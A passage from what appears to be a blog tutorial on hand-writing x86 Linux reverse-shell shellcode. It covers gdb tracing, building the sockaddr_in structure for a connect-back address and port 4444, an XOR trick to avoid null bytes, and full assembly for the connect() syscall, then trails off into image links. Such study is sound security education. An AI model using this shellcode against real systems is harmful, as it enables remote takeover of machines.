\n(gdb) define hook-stop\nType commands for definition of "hook-stop".\nEnd with a line saying just "end".\n>print\/x $eax\n>print\/x $ebx\n>print\/x $ecx\n>print\/x $edx\n>x\/4xw $esp\n>disassemble 0x8049000\n>end\n<\/pre><\/div>\n\n\nNow, every time we step through the program, the values of our specified registers are printed along with the top four stack values and the disassembled assembly instructions.<\/p>\n\n\n\n<\/p>\n\n\n\n
We can trace the program flow right up until the syscall to socket()<\/strong> is made, so that we ensure that the arguments are aligned correctly in the required registers and on the stack.<\/p>\n\n\n\n<\/p>\n\n\n\n
We reach the end of the function and find that EAX<\/strong> has been populated with the value of the socket descriptor, 0x3<\/strong>. This indicates a successful call to socket()<\/strong>.<\/p>\n\n\n\n<\/p>\n\n\n\n
Connecting to the socket<\/h3>\n\n\n\n Next, we look at the call that's made to connect()<\/strong>. Based on the man page, this system call connects the socket referenced by the provided socket descriptor to the address specified by addr.<\/p>\n\n\n\n<\/p>\n\n\n\n
The connect()<\/strong> function has the following function header:<\/p>\n\n\n\nint connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);\n<\/pre><\/div>\n\n\nBefore we get into the arguments for the connect()<\/strong> function, we note that the argument of socketcall()<\/strong> will now be set to the value for connect()<\/strong>.<\/p>\n\n\n\n<\/p>\n\n\n\n
We consult the \/usr\/include\/linux\/net.h file and note that connect()<\/strong> has a call value of 3<\/strong>.<\/p>\n\n\n\n<\/p>\n\n\n\n
connect() arguments<\/h3>\n\n\n\n Next, we look at each of the parameters to the connect()<\/strong> function.<\/p>\n\n\n\nsockfd<\/h4>\n\n\n\n The sockfd<\/strong> parameter is the file descriptor of the socket. This value was returned following a successful call to the socket()<\/strong> function and, following the syscall, is stored in the EAX register.<\/p>\n\n\n\n<\/p>\n\n\n\n
addr<\/h4>\n\n\n\n The addr<\/strong> parameter is a pointer to the desired family<\/strong>, port<\/strong> and address<\/strong> properties of our socket.<\/p>\n\n\n\nReferring to the C example source code, we note that the sockaddr<\/strong> structure is referenced by the addr<\/em> value.<\/p>\n\n\n\naddr.sin_family = AF_INET; \/\/ server socket type address family = internet protocol address\n addr.sin_port = htons( 1337 ); \/\/ connect-back port, converted to network byte order\n addr.sin_addr.s_addr = inet_addr("127.0.0.1"); \/\/ connect-back ip , converted to network byte order\n\n \/\/ create new TCP socket\n sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );\n\n \/\/ connect socket\n connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));\n<\/pre><\/div>\n\n\nAs we already know that sockfd refers to the file descriptor, we next look up the definition of sockaddr in socket.h:<\/p>\n\n\n
\n\/* Structure describing a generic socket address. *\/\nstruct sockaddr\n{\n __SOCKADDR_COMMON (sa_); \/* Common data: address family and length. *\/\n char sa_data[14]; \/* Address data. *\/\n};\n<\/pre><\/div>\n\n\nTo understand how the sa_data char array (sockaddr_in) is structured, we can refer to its definition in \/usr\/include\/linux\/in.h:<\/p>\n\n\n
\nstruct sockaddr_in {\n __kernel_sa_family_t sin_family; \/* Address family *\/\n __be16 sin_port; \/* Port number *\/\n struct in_addr sin_addr; \/* Internet address *\/\n\n \/* Pad to size of `struct sockaddr'. *\/\n unsigned char __pad[__SOCK_SIZE__ - sizeof(short int) -\n sizeof(unsigned short int) - sizeof(struct in_addr)];\n};\n<\/pre><\/div>\n\n\nAccording to the above definition, sockaddr_in has the following properties:<\/p>\n\n\n\n
\nsin_family - Address family<\/li>\n\n\n\n sin_port - TCP port<\/li>\n\n\n\n sin_address - IPv4 address<\/li>\n<\/ul>\n\n\n\nFor the purpose of initially simplifying our shellcode, we will set the port<\/strong> value to 4444<\/strong>, with the address set to our local Kali address of 192.168.105.151<\/strong>.<\/p>\n\n\n\naddrlen<\/h4>\n\n\n\n The addrlen<\/strong> argument specifies the size of the address structure pointed to by addr<\/em> in bytes. This will be 16 (0x10).<\/p>\n\n\n\nconnect() argument structure<\/h3>\n\n\n\n A breakdown of the arguments to connect()<\/strong> is as follows:<\/p>\n\n\n\nSyscall<\/th> Argument<\/th> Man Reference<\/th> C Code Reference<\/th><\/tr><\/thead> socketcall<\/td> call<\/td> Syscall number<\/td> -<\/td><\/tr> socketcall<\/td> args<\/td> Syscall arguments<\/td> -<\/td><\/tr> connect<\/td> sockfd<\/td> Socket file descriptor<\/td> host_sockid<\/td><\/tr> connect<\/td> addr<\/td> Socket address family, host IP address and port<\/td> &hostaddr<\/td><\/tr> connect<\/td> addrlen<\/td> Size in bytes of addr<\/td> sizeof(hostaddr)<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nTo understand how to convert our IPv4 address into the format expected by sin_addr, we can review the man page of inet_addr<\/strong>:<\/p>\n\n\n\n<\/p>\n\n\n\n
In the man page, we see that a function inet_aton()<\/strong> is used to convert the given IP address to binary form in network byte order.<\/p>\n\n\n\nWe can do the same in Python3 using the below code, giving us the value 0x9769a8c0<\/strong> for our given IP address:<\/p>\n\n\n\n>>> value = socket.inet_aton("192.168.105.151").hex()\n>>> little_hex = bytearray.fromhex(value)\n>>> little_hex.reverse()\n>>> str_little = ''.join(format(x, '02x') for x in little_hex)\n>>> print(str_little)\n9769a8c0\n>>>\n<\/pre><\/div>\n\n\nFollowing this, the values pointed to by addr (sockaddr_in) are as follows:<\/p>\n\n\n\nStruct<\/th> Argument<\/th> Man Reference<\/th> Value<\/th><\/tr><\/thead> sockaddr_in<\/td> sin_family<\/td> Address family<\/td> 0x2<\/td><\/tr> sockaddr_in<\/td> sin_port<\/td> TCP port to listen on in network byte order<\/td> 0x5c11<\/td><\/tr> sockaddr_in<\/td> sin_addr<\/td> Host IP address in network byte order<\/td> 0x9769a8c0<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nIn order to avoid pushing null values on the stack, we can instead XOR<\/strong> the host address value with 0xffffffff<\/strong>, move that resulting value into a register, and XOR that register again with 0xffffffff<\/strong> to get the original value. This will prevent us from pushing null bytes in the event that our host address contains zeroes.<\/p>\n\n\n\nBelow, we indicate how this behaviour works using Python. Initially, we set a to our original hex string of the host address, and XOR it with 0xffffffff to get a string which does not contain any null bytes. We then recover the original value by XORing it with 0xffffffff again.<\/p>\n\n\n
\n>>> a = 0x9769a8c0\n>>> b = 0xffffffff\n>>> c = hex(a ^ b)\n>>> print(c)\n0x6896573f\n>>> print(hex(c ^ 0xffffffff))\n0x9769a8c0\n<\/pre><\/div>\n\n\nWith the above in mind, we will push our XOR'd host address, 0x6896573f<\/strong> to the stack.<\/p>\n\n\n\nCalling connect()<\/h3>\n\n\n\n In case of our system call to socketcall()<\/strong>:<\/p>\n\n\n\n\nEAX<\/strong> - system call number (102)<\/li>\n\n\n\nEBX<\/strong> - call argument - connect (3)<\/li>\n\n\n\nECX<\/strong> - *args - connect arguments<\/li>\n<\/ul>\n\n\n\nTo begin, we must push the elements of the sockaddr_in structure to the stack in reverse order, starting with sin_addr.<\/p>\n\n\n\n
\nsockfd - Stored in EAX after call to socket()<\/strong>. We will save this value by moving it to the EDX register.<\/li>\n\n\n\naddr - We will store this value in the ESI register.\n\nsin_family - AF_INET (2)<\/li>\n\n\n\n sin_port - 4444 (0x5c11)<\/li>\n\n\n\n sin_addr - 192.168.105.151 (0x6896573f)<\/li>\n<\/ul>\n<\/li>\n\n\n\n addrlen = 16 (0x10)<\/li>\n<\/ul>\n\n\n\nThe overall argument structure for calling connect()<\/strong> will be as follows:<\/p>\n\n\n\nSyscall<\/th> argument<\/th> Description<\/th> Value<\/th><\/tr><\/thead> socketcall<\/td> syscall number<\/td> syscall value for socketcall<\/td> 0x66<\/td><\/tr> socketcall<\/td> call<\/td> socketcall value for bind<\/td> 0x2<\/td><\/tr> connect<\/td> sockfd<\/td> socket file descriptor<\/td> 0x3<\/td><\/tr> connect<\/td> addr<\/td> sockaddr_in structure<\/td> 2, 0x5c11, 0x6896573f<\/td><\/tr> connect<\/td> addrlen<\/td> Length of addr in bytes<\/td> 0x10<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nconnect() assembly code<\/h3>\n\n\n\n_connect:\n\n ; Clear EDX register and save the sockfd value returned from socket()\n xor edx, edx\n mov edx, eax\n\n ; Clear EAX register and set al to syscall number 102 in hex.\n xor eax, eax\n mov al, 0x66\n\n ; clear EBX register and set bl to 0x3 for connect.\n xor ebx, ebx\n mov ebx, 0x3\n\n ; Clear EDI register and push value for IP address.\n xor edi, edi\n mov edi, 0x6896573f\n ; XOR EDI to get original IP address hex value whilst avoiding null bytes.\n xor edi, 0xffffffff\n\n ; Clear ECX register and push IP address\n xor ecx, ecx\n push edi; sin_addr - 192.168.105.151 (0x6896573f)\n push word 0x5c11; sin_port - 4444 (0x5c11)\n push word 0x2; sin_family - AF_INET (2)\n\n ; Save pointer to sockaddr to ESI register\n mov esi, esp\n\n push 0x10; addrlen - 16 (0x10)\n push esi; addr\n push edx; sockfd\n\n ; Set ECX to stop of stack for syscall arguments *args\n mov ecx, esp\n\n ; Execute connect() syscall\n int 0x80\n<\/pre><\/div>\n\n\nconnect() analysis<\/h4>\n\n\n\n We can now step through our implementation of connect()<\/strong> using gdb.<\/p>\n\n\n\n<\/p>\n\n\n\n
We once again define a hook-stop for the scope of the connect()<\/strong> assembly code:<\/p>\n\n\n\n>print\/x $eax\n>print\/x $ebx\n>print\/x $ecx\n>print\/x $edx\n>print\/x $edi\n>x\/4xw $esp\n>disassemble 0x8049013\n>end\n<\/pre><\/div>\n\n\nAs we step through, we note that instructions save the socket file descriptor to EDX<\/strong> as intended:<\/p>\n\n\n\n<\/p>\n\n\n\n
Next, the syscall is set up for the call to connect()<\/strong> by moving 0x3<\/strong> to the bl<\/strong> register:<\/p>\n\n\n\n<\/p>\n\n\n\n
Next, the XOR'd hex value of our host address<\/strong> and 0xffffffff<\/strong> is moved to the EDI<\/strong> register:<\/p>\n\n\n\n<\/p>\n\n\n\n
This value is then XOR'd with 0xffffffff again to return the hex value of our host address to avoid null bytes:<\/p>\n\n\n\n<\/p>\n\n\n\n
Next, the values for the port and protocol family are pushed to the stack:<\/p>\n\n\n\n<\/p>\n\n\n\n
The ESP<\/strong> value is moved to the ESI<\/strong> register, so as to save the sockaddr_in structure that we have pushed to the stack.<\/p>\n\n\n\n<\/p>\n\n\n\n
The addrlen, *addr and sockfd values are pushed to the stack:<\/p>\n\n\n\n
![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422220624.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422220908.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419122207.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419122959.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419124414.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419123827.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220419124040.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420193916.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420194032.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422224747.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422225228.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422225644.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200152.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220420200318.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422230816.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220422234139.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425195140.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425205137.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425215241.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425215500.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425215612.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425215724.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425215920.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425220117.png\")
<\/figure>\n\n\n\n![\"\"\/](\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/04\/Pasted-image-20220425220539.png\")
<\/figure>\n\n\n\n